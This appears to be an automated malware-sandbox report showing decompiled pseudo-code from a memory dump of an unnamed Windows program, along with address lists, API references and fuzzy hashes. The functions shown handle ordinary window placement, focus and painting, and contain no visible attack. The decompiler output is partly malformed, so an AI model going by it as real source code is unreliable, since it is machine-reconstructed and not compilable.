								_push( *[fs:eax]);
								 *[fs:eax] = _t379;
								E0041D740(_v24,  *(_v40 + 0x18));
								E0041D5E0(_v24);
								E00440014(_v16, _v40 + 0x1c, _v24,  *((intOrPtr*)(_v40 + 0x10)));
								_pop(_t333);
								 *[fs:eax] = _t333;
								_push(0x43fb8c);
								__eflags = 0;
								E0041D740(_v24, 0);
								return RestoreDC( *(_v40 + 0x18), _v28);
							}
						} else {
							_t214 = _t182 - 1;
							if(_t214 == 0) {
								_v44 =  *((intOrPtr*)(__edx + 8));
								_t286 =  *((intOrPtr*)(_v8 + 8)) - 1;
								__eflags = _t286;
								if(_t286 < 0) {
									goto L67;
								} else {
									_t287 = _t286 + 1;
									_t372 = 0;
									__eflags = 0;
									while(1) {
										_v16 = E0043EAFC(E00413E68(_v8, _t372), 0,  *((intOrPtr*)(_v44 + 8)));
										__eflags = _v16;
										if(_v16 != 0) {
											break;
										}
										_t372 = _t372 + 1;
										_t287 = _t287 - 1;
										__eflags = _t287;
										if(_t287 != 0) {
											continue;
										} else {
											goto L67;
										}
										goto L69;
									}
									_t221 =  *((intOrPtr*)(_v8 + 0x10));
									L00406874();
									_v32 = _t221;
									 *[fs:eax] = _t379;
									_v24 = E0041D184(0, 1);
									 *[fs:eax] = _t379;
									_v28 = SaveDC(_v32);
									 *[fs:eax] = _t379;
									E0041D740(_v24, _v32);
									E0041D5E0(_v24);
									 *((intOrPtr*)( *_v16 + 0x38))(_v44 + 0x10,  *[fs:eax], 0x43fca3, _t377,  *[fs:eax], 0x43fcc0, _t377,  *[fs:eax], 0x43fce5, _t377, _t221);
									_pop(_t342);
									 *[fs:eax] = _t342;
									_push(0x43fcaa);
									__eflags = 0;
									E0041D740(_v24, 0);
									return RestoreDC(_v32, _v28);
								}
							} else {
								if(_t214 == 0x27) {
									_v36 =  *((intOrPtr*)(__edx + 8));
									_t290 =  *((intOrPtr*)(_v8 + 8)) - 1;
									__eflags = _t290;
									if(_t290 < 0) {
										goto L67;
									} else {
										_t291 = _t290 + 1;
										_t373 = 0;
										__eflags = 0;
										while(1) {
											_t251 =  *((intOrPtr*)( *((intOrPtr*)(E00413E68(_v8, _t373))) + 0x34))();
											_t346 = _v36;
											__eflags = _t251 -  *((intOrPtr*)(_t346 + 0xc));
											if(_t251 !=  *((intOrPtr*)(_t346 + 0xc))) {
												_v16 = E0043EAFC(E00413E68(_v8, _t373), 1,  *((intOrPtr*)(_v36 + 0xc)));
											} else {
												_v16 =  *((intOrPtr*)(E00413E68(_v8, _t373) + 0x34));
											}
											__eflags = _v16;
											if(_v16 != 0) {
												break;
											}
											_t373 = _t373 + 1;
											_t291 = _t291 - 1;
											__eflags = _t291;
											if(_t291 != 0) {
												continue;
											} else {
												goto L67;
											}
											goto L68;
										}
										_t257 = E0043EB2C(E00413E68(_v8, _t373), 1,  *((intOrPtr*)(_v36 + 8)));
										__eflags = _t257;
										if(_t257 == 0) {
											_t265 = E00413E68(_v8, _t373);
											__eflags = 0;
											_t257 = E0043EB2C(_t265, 0,  *((intOrPtr*)(_v36 + 0xc)));
										}
										_t353 =  *0x47a0fc; // 0x47bba0
										_t56 =  *_t353 + 0x6c; // 0x0
										_t355 =  *_t56;
										__eflags = _t355;
										if(_t355 != 0) {
											__eflags = _t257;
											if(_t257 == 0) {
												_t257 =  *(_t355 + 0x158);
											}
											__eflags =  *(_t355 + 0x228) & 0x00000008;
											if(( *(_t355 + 0x228) & 0x00000008) == 0) {
												_t356 =  *0x479fc4; // 0x47bb9c
												E0044B7FC( *_t356, _t291, _t257, _t373, _t375);
											} else {
												E0044B884();
											}
										}
									}
								} else {
									L67:
									_push( *(_t375 + 8));
									_push( *(_t375 + 4));
									_push( *_t375);
									_t144 =  *((intOrPtr*)(_v8 + 0x10));
									_push(_t144);
									L0040668C();
									 *((intOrPtr*)(_t375 + 0xc)) = _t144;
								}
								L68:
								_pop(_t311);
								 *[fs:eax] = _t311;
								_push(0x43fd76);
								return E004041E0( &_v52);
							}
						}
					}
				}
				L69:
			}

0x0043f83d
0x0043f83f
0x0043f847
0x0043f84a
0x0043f84c
0x0043f851
0x0043f852
0x0043f857
0x0043f85a
0x0043f85d
0x0043f85f
0x0043f864
0x0043f886
0x0043f886
0x0043f88b
0x0043f8da
0x0043f8db
0x0043f8dd
0x00000000
0x0043f8e3
0x0043f8e3
0x0043f8e4
0x0043f8e4
0x0043f8e6
0x0043f8f3
0x0043f8f8
0x0043f8fa
0x00000000
0x00000000
0x0043f900
0x0043f901
0x0043f901
0x0043f902
0x00000000
0x0043f904
0x00000000
0x0043f904
0x00000000
0x0043f902
0x0043f8e6
0x0043f88d
0x0043f88d
0x0043f88d
0x0043f890
0x0043f909
0x0043f90d
0x0043f911
0x0043f913
0x0043f913
0x0043f91d
0x0043f91e
0x0043f920
0x0043f996
0x0043f996
0x0043f99f
0x00000000
0x0043f922
0x0043f922
0x0043f923
0x0043f923
0x0043f925
0x0043f925
0x0043f929
0x0043f94f
0x0043f92b
0x0043f92b
0x0043f92e
0x0043f930
0x0043f942
0x0043f932
0x0043f93d
0x0043f93d
0x0043f930
0x0043f957
0x0043f95c
0x0043f967
0x0043f96a
0x0043f96e
0x00000000
0x00000000
0x0043f992
0x0043f993
0x0043f993
0x0043f994
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0043f994
0x0043f979
0x0043f981
0x0043f988
0x0043f988
0x0043f892
0x0043f892
0x0043f893
0x0043fcfc
0x0043fcfd
0x0043fcff
0x00000000
0x0043fd01
0x0043fd01
0x0043fd02
0x0043fd02
0x0043fd04
0x0043fd0e
0x0043fd16
0x0043fd19
0x0043fd1c
0x00000000
0x00000000
0x0043fd26
0x0043fd2b
0x0043fd2d
0x0043fd3b
0x0043fd3c
0x0043fd3c
0x0043fd3d
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0043fd2d
0x0043fd34
0x0043fd34
0x0043f899
0x00000000
0x0043f899
0x0043f893
0x0043f890
0x00000000
0x0043f866
0x0043f866
0x0043f8a4
0x0043f8a5
0x0043f8a7
0x00000000
0x0043f8ad
0x0043f8ad
0x0043f8ae
0x0043f8ae
0x0043f8b0
0x0043f8b5
0x0043f8be
0x0043f8c3
0x0043f8c5
0x00000000
0x00000000
0x0043f8cb
0x0043f8cc
0x0043f8cc
0x0043f8cd
0x00000000
0x0043f8cf
0x00000000
0x0043f8cf
0x00000000
0x0043f8cd
0x0043f8b0
0x00000000
0x0043f868
0x0043f868
0x0043f86b
0x0043faae
0x0043fab7
0x0043fab8
0x0043faba
0x00000000
0x0043fac0
0x0043fac0
0x0043fac1
0x0043fac1
0x0043fac3
0x0043fada
0x0043fadd
0x0043fae1
0x00000000
0x00000000
0x0043fba9
0x0043fbaa
0x0043fbaa
0x0043fbab
0x00000000
0x0043fbb1
0x00000000
0x0043fbb1
0x00000000
0x0043fbab
0x0043faf3
0x0043faf8
0x0043faf9
0x0043fafe
0x0043fb01
0x0043fb10
0x0043fb15
0x0043fb16
0x0043fb1b
0x0043fb1e
0x0043fb2a
0x0043fb3f
0x0043fb58
0x0043fb5f
0x0043fb62
0x0043fb65
0x0043fb6a
0x0043fb6f
0x0043fb84
0x0043fb84
0x0043f871
0x0043f871
0x0043f872
0x0043fbb9
0x0043fbc2
0x0043fbc3
0x0043fbc5
0x00000000
0x0043fbcb
0x0043fbcb
0x0043fbcc
0x0043fbcc
0x0043fbce
0x0043fbe5
0x0043fbe8
0x0043fbec
0x00000000
0x00000000
0x0043fcec
0x0043fced
0x0043fced
0x0043fcee
0x00000000
0x0043fcf4
0x00000000
0x0043fcf4
0x00000000
0x0043fcee
0x0043fbf5
0x0043fbf9
0x0043fbfe
0x0043fc0c
0x0043fc1b
0x0043fc29
0x0043fc35
0x0043fc43
0x0043fc4c
0x0043fc61
0x0043fc7b
0x0043fc80
0x0043fc83
0x0043fc86
0x0043fc8b
0x0043fc90
0x0043fca2
0x0043fca2
0x0043f878
0x0043f87b
0x0043f9ac
0x0043f9b5
0x0043f9b6
0x0043f9b8
0x00000000
0x0043f9be
0x0043f9be
0x0043f9bf
0x0043f9bf
0x0043f9c1
0x0043f9cd
0x0043f9d0
0x0043f9d3
0x0043f9d6
0x0043fa01
0x0043f9d8
0x0043f9e5
0x0043f9e5
0x0043fa04
0x0043fa08
0x00000000
0x00000000
0x0043fa9e
0x0043fa9f
0x0043fa9f
0x0043faa0
0x00000000
0x0043faa6
0x00000000
0x0043faa6
0x00000000
0x0043faa0
0x0043fa20
0x0043fa25
0x0043fa27
0x0043fa2e
0x0043fa39
0x0043fa3b
0x0043fa3b
0x0043fa40
0x0043fa48
0x0043fa48
0x0043fa4b
0x0043fa4d
0x0043fa53
0x0043fa55
0x0043fa5c
0x0043fa5c
0x0043fa68
0x0043fa6f
0x0043fa8b
0x0043fa94
0x0043fa71
0x0043fa81
0x0043fa81
0x0043fa6f
0x0043fa4d
0x0043f881
0x0043fd3f
0x0043fd42
0x0043fd46
0x0043fd49
0x0043fd4d
0x0043fd50
0x0043fd51
0x0043fd56
0x0043fd56
0x0043fd59
0x0043fd5b
0x0043fd5e
0x0043fd61
0x0043fd6e
0x0043fd6e
0x0043f872
0x0043f86b
0x0043f866
0x00000000

APIs

SaveDC.GDI32(?), ref: 0043FB0B
RestoreDC.GDI32(?,?), ref: 0043FB7F
SaveDC.GDI32(?), ref: 0043FC30
RestoreDC.GDI32(?,?), ref: 0043FC9D
NtdllDefWindowProc_A.NTDLL(?,?,?,?,00000000,0043FD6F), ref: 0043FD51

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: RestoreSave$NtdllProc_Window
String ID:
API String ID: 2725519021-0
Opcode ID: 11c90f6c02996e9a34e51eb691b7c6824ddf5cdce80ccbf55f2a12286eaf901f
Instruction ID: 2b1ceaca304b7cde617366fa2980bf74fb0026d1a4822ac40b68014f7ef95906
Opcode Fuzzy Hash: 11c90f6c02996e9a34e51eb691b7c6824ddf5cdce80ccbf55f2a12286eaf901f
Instruction Fuzzy Hash: 22E12A74A002099FCB14EF6AC485A9EB7F5FF4C304F21956AE805A7761C638ED46CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0044ADC0, Relevance: 9.1, APIs: 6, Instructions: 86
windownativeCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E0044ADC0(void* __eax) {
				struct HWND__* _t21;
				intOrPtr* _t26;
				signed int _t29;
				intOrPtr* _t30;
				int _t33;
				intOrPtr _t36;
				void* _t51;
				int _t60;

				_t51 = __eax;
				_t21 = IsIconic( *(__eax + 0x30));
				if(_t21 != 0) {
					SetActiveWindow( *(_t51 + 0x30));
					if( *((intOrPtr*)(_t51 + 0x44)) == 0 ||  *((char*)(_t51 + 0x5b)) == 0 &&  *((char*)( *((intOrPtr*)(_t51 + 0x44)) + 0x57)) == 0) {
						L6:
						E00449D18( *(_t51 + 0x30), 9, __eflags);
					} else {
						_t60 = IsWindowEnabled(E0043260C( *((intOrPtr*)(_t51 + 0x44))));
						if(_t60 == 0) {
							goto L6;
						} else {
							_push(0);
							_push(0xf120);
							_push(0x112);
							_push( *(_t51 + 0x30));
							L0040668C();
						}
					}
					_t26 =  *0x479e84; // 0x47b910
					_t29 =  *((intOrPtr*)( *_t26))(1, 0, 0, 0x40) >> 1;
					if(_t60 < 0) {
						asm("adc eax, 0x0");
					}
					_t30 =  *0x479e84; // 0x47b910
					_t33 =  *((intOrPtr*)( *_t30))(0, _t29) >> 1;
					if(_t60 < 0) {
						asm("adc eax, 0x0");
					}
					SetWindowPos( *(_t51 + 0x30), 0, _t33, ??, ??, ??, ??);
					_t36 =  *((intOrPtr*)(_t51 + 0x44));
					if(_t36 != 0 &&  *((char*)(_t36 + 0x22b)) == 1 &&  *((char*)(_t36 + 0x57)) == 0) {
						E004459F0(_t36, 0);
						E00447E14( *((intOrPtr*)(_t51 + 0x44)));
					}
					E0044A40C(_t51);
					_t21 =  *0x47bba0; // 0x2321310
					_t15 = _t21 + 0x64; // 0x0
					_t55 =  *_t15;
					if( *_t15 != 0) {
						_t21 = SetFocus(E0043260C(_t55));
					}
					if( *((short*)(_t51 + 0x122)) != 0) {
						return  *((intOrPtr*)(_t51 + 0x120))();
					}
				}
				return _t21;
			}

0x0044adc2
0x0044adc8
0x0044adcf
0x0044add9
0x0044ade2
0x0044ae1c
0x0044ae24
0x0044adf3
0x0044ae01
0x0044ae03
0x00000000
0x0044ae05
0x0044ae05
0x0044ae07
0x0044ae0c
0x0044ae14
0x0044ae15
0x0044ae15
0x0044ae03
0x0044ae31
0x0044ae3a
0x0044ae3c
0x0044ae3e
0x0044ae3e
0x0044ae44
0x0044ae4d
0x0044ae4f
0x0044ae51
0x0044ae51
0x0044ae5b
0x0044ae60
0x0044ae65
0x0044ae78
0x0044ae80
0x0044ae80
0x0044ae87
0x0044ae8c
0x0044ae91
0x0044ae91
0x0044ae96
0x0044aea0
0x0044aea0
0x0044aead
0x00000000
0x0044aeb7
0x0044aead
0x0044aebf

APIs

IsIconic.USER32(?), ref: 0044ADC8
SetActiveWindow.USER32(?,?,?,?,0044A7ED,00000000,0044ACAB), ref: 0044ADD9
IsWindowEnabled.USER32(00000000), ref: 0044ADFC
NtdllDefWindowProc_A.NTDLL(?,00000112,0000F120,00000000,00000000,?,?,?,?,0044A7ED,00000000,0044ACAB), ref: 0044AE15
SetWindowPos.USER32(?,00000000,00000000,?,?,0044A7ED,00000000,0044ACAB), ref: 0044AE5B
SetFocus.USER32(00000000,?,00000000,00000000,?,?,0044A7ED,00000000,0044ACAB), ref: 0044AEA0

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: Window$ActiveEnabledFocusIconicNtdllProc_
String ID:
API String ID: 3996302123-0
Opcode ID: a18e5910c5b1de6d2910ce6abcd8df4b9d6cfa4e70dc6f101cacd80208305458
Instruction ID: 09b234ad3082483ebd828ff1cb0b2d1dbf2587af6458b002df5a589e96624a01
Opcode Fuzzy Hash: a18e5910c5b1de6d2910ce6abcd8df4b9d6cfa4e70dc6f101cacd80208305458
Instruction Fuzzy Hash: 633121717802409BFB10EB69CD86B563798AF08704F1804AABA14DF2D7D67DEC64875E

Uniqueness

Uniqueness Score: -1.00%

Function 00431FF8, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81
windowCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00431FF8(void* __eax, int __ecx, int __edx, int _a4, int _a8) {
				void* _v20;
				struct _WINDOWPLACEMENT _v48;
				char _v64;
				void* _t31;
				int _t45;
				int _t51;
				void* _t52;
				int _t56;
				int _t58;

				_t56 = __ecx;
				_t58 = __edx;
				_t52 = __eax;
				if(__edx !=  *((intOrPtr*)(__eax + 0x40)) || __ecx !=  *((intOrPtr*)(__eax + 0x44)) || _a8 !=  *((intOrPtr*)(__eax + 0x48))) {
					L4:
					if(E0043286C(_t52) == 0) {
						L7:
						 *(_t52 + 0x40) = _t58;
						 *(_t52 + 0x44) = _t56;
						 *((intOrPtr*)(_t52 + 0x48)) = _a8;
						 *((intOrPtr*)(_t52 + 0x4c)) = _a4;
						_t31 = E0043286C(_t52);
						__eflags = _t31;
						if(_t31 != 0) {
							_v48.length = 0x2c;
							GetWindowPlacement( *(_t52 + 0x180),  &_v48);
							E0042B8F8(_t52,  &_v64);
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							SetWindowPlacement( *(_t52 + 0x180),  &_v48);
						}
						L9:
						E0042B5AC(_t52);
						return E00403674(_t52, _t66);
					}
					_t45 = IsIconic( *(_t52 + 0x180));
					_t66 = _t45;
					if(_t45 != 0) {
						goto L7;
					}
					SetWindowPos( *(_t52 + 0x180), 0, _t58, _t56, _a8, _a4, 0x14);
					goto L9;
				} else {
					_t51 = _a4;
					if(_t51 ==  *((intOrPtr*)(__eax + 0x4c))) {
						return _t51;
					}
					goto L4;
				}
			}

0x00432001
0x00432003
0x00432005
0x0043200a
0x00432025
0x0043202e
0x0043205c
0x0043205c
0x0043205f
0x00432065
0x0043206b
0x00432070
0x00432075
0x00432077
0x00432079
0x0043208b
0x00432095
0x004320a0
0x004320a1
0x004320a2
0x004320a3
0x004320af
0x004320af
0x004320b4
0x004320b6
0x00000000
0x004320c1
0x00432037
0x0043203c
0x0043203e
0x00000000
0x00000000
0x00432055
0x00000000
0x00432019
0x00432019
0x0043201f
0x004320cc
0x004320cc
0x00000000
0x0043201f

APIs

IsIconic.USER32(?), ref: 00432037
SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00432055
GetWindowPlacement.USER32(?,0000002C), ref: 0043208B
SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 004320AF

Strings

,, xrefs: 00432079

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: Window$Placement$Iconic
String ID: ,
API String ID: 568898626-3772416878
Opcode ID: aae737d8b8d5e18feef5c1e7b7c71cb3ea7ab689b8d9494d497e435d334c8786
Instruction ID: f4f626083127390298c72cc44398af9856f059a5743414f4a400364393e0e9ff
Opcode Fuzzy Hash: aae737d8b8d5e18feef5c1e7b7c71cb3ea7ab689b8d9494d497e435d334c8786
Instruction Fuzzy Hash: 2A214171600204ABCF18EF69C9C099A77B8AF0D314F049466FE18EF346D675D908CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00444A1C, Relevance: 7.8, APIs: 5, Instructions: 284
windowCOMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E00444A1C(intOrPtr __eax, struct HWND__** __edx) {
				intOrPtr _v8;
				int _v12;
				intOrPtr _v16;
				struct HDC__* _v20;
				struct HWND__* _v24;
				void* __ebp;
				struct HWND__* _t92;
				intOrPtr _t112;
				intOrPtr _t115;
				struct HWND__* _t121;
				struct HWND__* _t124;
				intOrPtr _t128;
				struct HWND__* _t129;
				intOrPtr _t130;
				intOrPtr _t131;
				struct HWND__* _t133;
				struct HWND__* _t136;
				intOrPtr _t142;
				intOrPtr _t172;
				struct HDC__* _t177;
				struct HWND__** _t200;
				struct HWND__* _t218;
				struct HWND__* _t219;
				intOrPtr _t228;
				void* _t230;
				void* _t231;
				intOrPtr _t237;
				intOrPtr _t245;
				struct HWND__* _t249;
				struct HWND__* _t250;
				struct HWND__* _t255;
				struct HWND__* _t256;
				void* _t258;
				void* _t260;
				intOrPtr _t261;
				void* _t263;
				void* _t267;

				_t258 = _t260;
				_t261 = _t260 + 0xffffffec;
				_t200 = __edx;
				_v8 = __eax;
				_t92 =  *__edx;
				_t218 = _t92;
				_t263 = _t218 - 0x46;
				if(_t263 > 0) {
					_t219 = _t218 - 0xb01a;
					__eflags = _t219;
					if(_t219 == 0) {
						__eflags =  *(_v8 + 0xa0);
						if(__eflags != 0) {
							E00403674(_v8, __eflags);
						}
					} else {
						__eflags = _t219 == 1;
						if(_t219 == 1) {
							__eflags =  *(_v8 + 0xa0);
							if(__eflags != 0) {
								E00403674(_v8, __eflags);
							}
						} else {
							goto L41;
						}
					}
					goto L43;
				} else {
					if(_t263 == 0) {
						_t112 = _v8;
						_t228 =  *0x444e50; // 0x1
						__eflags = _t228 - ( *(_t112 + 0x1c) &  *0x444e4c);
						if(_t228 == ( *(_t112 + 0x1c) &  *0x444e4c)) {
							_t115 = _v8;
							__eflags =  *((intOrPtr*)(_t115 + 0x230)) - 0xffffffffffffffff;
							if( *((intOrPtr*)(_t115 + 0x230)) - 0xffffffffffffffff < 0) {
								_t128 = _v8;
								__eflags =  *((char*)(_t128 + 0x22b)) - 2;
								if( *((char*)(_t128 + 0x22b)) != 2) {
									_t129 = __edx[2];
									_t26 = _t129 + 0x18;
									 *_t26 =  *(_t129 + 0x18) | 0x00000002;
									__eflags =  *_t26;
								}
							}
							_t121 =  *((intOrPtr*)(_v8 + 0x230)) - 1;
							__eflags = _t121;
							if(_t121 == 0) {
								L30:
								_t124 =  *((intOrPtr*)(_v8 + 0x229)) - 2;
								__eflags = _t124;
								if(_t124 == 0) {
									L32:
									 *( *((intOrPtr*)(_t200 + 8)) + 0x18) =  *( *((intOrPtr*)(_t200 + 8)) + 0x18) | 0x00000001;
								} else {
									__eflags = _t124 == 3;
									if(_t124 == 3) {
										goto L32;
									}
								}
							} else {
								__eflags = _t121 == 2;
								if(_t121 == 2) {
									goto L30;
								}
							}
						}
						goto L43;
					} else {
						_t230 = _t218 + 0xfffffffa - 3;
						if(_t230 < 0) {
							__eflags =  *0x479ba8;
							if( *0x479ba8 != 0) {
								__eflags =  *__edx - 7;
								if( *__edx != 7) {
									goto L43;
								} else {
									_t130 = _v8;
									__eflags =  *(_t130 + 0x1c) & 0x00000010;
									if(( *(_t130 + 0x1c) & 0x00000010) != 0) {
										goto L43;
									} else {
										_t255 = 0;
										_t131 = _v8;
										__eflags =  *((char*)(_t131 + 0x22f)) - 2;
										if( *((char*)(_t131 + 0x22f)) != 2) {
											_t133 =  *(_v8 + 0x220);
											__eflags = _t133;
											if(_t133 != 0) {
												__eflags = _t133 - _v8;
												if(_t133 != _v8) {
													_t255 = E0043260C(_t133);
												}
											}
										} else {
											_t136 = E00445348(_v8);
											__eflags = _t136;
											if(_t136 != 0) {
												_t255 = E0043260C(E00445348(_v8));
											}
										}
										__eflags = _t255;
										if(_t255 == 0) {
											goto L43;
										} else {
											_t92 = SetFocus(_t255);
										}
									}
								}
							}
							goto L44;
						} else {
							_t231 = _t230 - 0x22;
							if(_t231 == 0) {
								_v24 = __edx[2];
								__eflags = _v24->i - 1;
								if(_v24->i != 1) {
									goto L43;
								} else {
									_t142 = _v8;
									__eflags =  *(_t142 + 0x248);
									if( *(_t142 + 0x248) == 0) {
										goto L43;
									} else {
										_t249 = E0043EAFC( *((intOrPtr*)(_v8 + 0x248)), 0,  *((intOrPtr*)(_v24 + 8)));
										__eflags = _t249;
										if(_t249 == 0) {
											goto L43;
										} else {
											_v16 = E0041D184(0, 1);
											_push(_t258);
											_push(0x444c95);
											_push( *[fs:eax]);
											 *[fs:eax] = _t261;
											_v12 = SaveDC( *(_v24 + 0x18));
											_push(_t258);
											_push(0x444c78);
											_push( *[fs:eax]);
											 *[fs:eax] = _t261;
											E0041D740(_v16,  *(_v24 + 0x18));
											E0041D5E0(_v16);
											E00440014(_t249, _v24 + 0x1c, _v16,  *((intOrPtr*)(_v24 + 0x10)));
											_pop(_t237);
											 *[fs:eax] = _t237;
											_push(0x444c7f);
											__eflags = 0;
											E0041D740(_v16, 0);
											return RestoreDC( *(_v24 + 0x18), _v12);
										}
									}
								}
							} else {
								if(_t231 == 1) {
									_t256 = __edx[2];
									__eflags = _t256->i - 1;
									if(_t256->i != 1) {
										goto L43;
									} else {
										_t172 = _v8;
										__eflags =  *(_t172 + 0x248);
										if( *(_t172 + 0x248) == 0) {
											goto L43;
										} else {
											_t250 = E0043EAFC( *((intOrPtr*)(_v8 + 0x248)), 0,  *((intOrPtr*)(_t256 + 8)));
											__eflags = _t250;
											if(_t250 == 0) {
												goto L43;
											} else {
												_t177 = E0043260C(_v8);
												L00406874();
												_v20 = _t177;
												 *[fs:eax] = _t261;
												_v16 = E0041D184(0, 1);
												 *[fs:eax] = _t261;
												_v12 = SaveDC(_v20);
												 *[fs:eax] = _t261;
												E0041D740(_v16, _v20);
												E0041D5E0(_v16);
												 *((intOrPtr*)(_t250->i + 0x38))(_t256 + 0x10,  *[fs:eax], 0x444d7f, _t258,  *[fs:eax], 0x444d9c, _t258,  *[fs:eax], 0x444dc3, _t258, _t177);
												_pop(_t245);
												 *[fs:eax] = _t245;
												_push(0x444d86);
												__eflags = 0;
												E0041D740(_v16, 0);
												return RestoreDC(_v20, _v12);
											}
										}
									}
								} else {
									L41:
									_t267 = _t92 -  *0x47bba8; // 0xc075
									if(_t267 == 0) {
										E0042D0C4(_v8, 0, 0xb025, 0);
										E0042D0C4(_v8, 0, 0xb024, 0);
										E0042D0C4(_v8, 0, 0xb035, 0);
										E0042D0C4(_v8, 0, 0xb009, 0);
										E0042D0C4(_v8, 0, 0xb008, 0);
										E0042D0C4(_v8, 0, 0xb03d, 0);
									}
									L43:
									_t92 = E00430020(_v8, _t200);
									L44:
									return _t92;
								}
							}
						}
					}
				}
			}

0x00444a1d
0x00444a1f
0x00444a25
0x00444a27
0x00444a2a
0x00444a2c
0x00444a2e
0x00444a31
0x00444a56
0x00444a56
0x00444a5c
0x00444b08
0x00444b0f
0x00444b1c
0x00444b1c
0x00444a62
0x00444a62
0x00444a63
0x00444ae7
0x00444aee
0x00444afb
0x00444afb
0x00444a65
0x00000000
0x00444a65
0x00444a63
0x00000000
0x00444a33
0x00444a33
0x00444b26
0x00444b34
0x00444b3b
0x00444b3e
0x00444b44
0x00444b4e
0x00444b50
0x00444b52
0x00444b55
0x00444b5c
0x00444b5e
0x00444b61
0x00444b61
0x00444b61
0x00444b61
0x00444b5c
0x00444b6e
0x00444b6e
0x00444b70
0x00444b7a
0x00444b83
0x00444b83
0x00444b85
0x00444b8f
0x00444b92
0x00444b87
0x00444b87
0x00444b89
0x00000000
0x00000000
0x00444b89
0x00444b72
0x00444b72
0x00444b74
0x00000000
0x00000000
0x00444b74
0x00444b70
0x00000000
0x00444a39
0x00444a3c
0x00444a3f
0x00444a6a
0x00444a71
0x00444a77
0x00444a7a
0x00000000
0x00444a80
0x00444a80
0x00444a83
0x00444a87
0x00000000
0x00444a8d
0x00444a8d
0x00444a8f
0x00444a92
0x00444a99
0x00444abb
0x00444ac1
0x00444ac3
0x00444ac5
0x00444ac8
0x00444acf
0x00444acf
0x00444ac8
0x00444a9b
0x00444a9e
0x00444aa3
0x00444aa5
0x00444ab4
0x00444ab4
0x00444aa5
0x00444ad1
0x00444ad3
0x00000000
0x00444ad9
0x00444ada
0x00444ada
0x00444ad3
0x00444a87
0x00444a7a
0x00000000
0x00444a41
0x00444a41
0x00444a44
0x00444b9e
0x00444ba4
0x00444ba7
0x00000000
0x00444bad
0x00444bad
0x00444bb0
0x00444bb7
0x00000000
0x00444bbd
0x00444bd3
0x00444bd5
0x00444bd7
0x00000000
0x00444bdd
0x00444be9
0x00444bee
0x00444bef
0x00444bf4
0x00444bf7
0x00444c06
0x00444c0b
0x00444c0c
0x00444c11
0x00444c14
0x00444c20
0x00444c33
0x00444c4b
0x00444c52
0x00444c55
0x00444c58
0x00444c5d
0x00444c62
0x00444c77
0x00444c77
0x00444bd7
0x00444bb7
0x00444a4a
0x00444a4b
0x00444c9c
0x00444c9f
0x00444ca2
0x00000000
0x00444ca8
0x00444ca8
0x00444cab
0x00444cb2
0x00000000
0x00444cb8
0x00444ccb
0x00444ccd
0x00444ccf
0x00000000
0x00444cd5
0x00444cd8
0x00444cde
0x00444ce3
0x00444cf1
0x00444d00
0x00444d0e
0x00444d1a
0x00444d28
0x00444d31
0x00444d44
0x00444d57
0x00444d5c
0x00444d5f
0x00444d62
0x00444d67
0x00444d6c
0x00444d7e
0x00444d7e
0x00444ccf
0x00444cb2
0x00444a51
0x00444dca
0x00444dca
0x00444dd0
0x00444dde
0x00444def
0x00444e00
0x00444e11
0x00444e22
0x00444e33
0x00444e33
0x00444e38
0x00444e3d
0x00444e42
0x00444e48
0x00444e48
0x00444a4b
0x00444a44
0x00444a3f
0x00444a33

APIs

SetFocus.USER32(00000000), ref: 00444ADA
SaveDC.GDI32(?), ref: 00444C01
RestoreDC.GDI32(?,?), ref: 00444C72
SaveDC.GDI32(?), ref: 00444D15
RestoreDC.GDI32(?,?), ref: 00444D79

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: RestoreSave$Focus
String ID:
API String ID: 1675357626-0
Opcode ID: 6459d9a12d5297b45977446b9e8359c2b755e30534f2d9c0bcc8ae5443016906
Instruction ID: 5bd2a619aa4dd519aa99fe6b3c75e9308ac0c94b799b71adcf0a8c30c5240095
